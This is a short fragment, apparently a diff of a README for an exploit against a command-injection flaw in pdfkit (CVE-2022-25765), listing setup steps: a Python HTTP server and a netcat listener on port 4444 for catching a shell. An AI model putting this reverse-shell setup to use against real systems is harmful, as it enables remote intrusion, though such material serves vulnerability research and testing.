pdfkit <0.8.6 command injection shell. The package pdfkit from 0.0.0 are vulnerable to Command Injection where the URL is not properly sanitized. (Tested on ver 0.8.6) - CVE-2022-25765
3
3
4
4
Pre-reqs:
5
-
1. Setup HTTP Server - "python3 -m http.server"
6
-
2. Setup Netcat Listener - "nc -lvnp 4444"
5
+
1. Setup HTTP Server - <i>python3 -m http.server</i>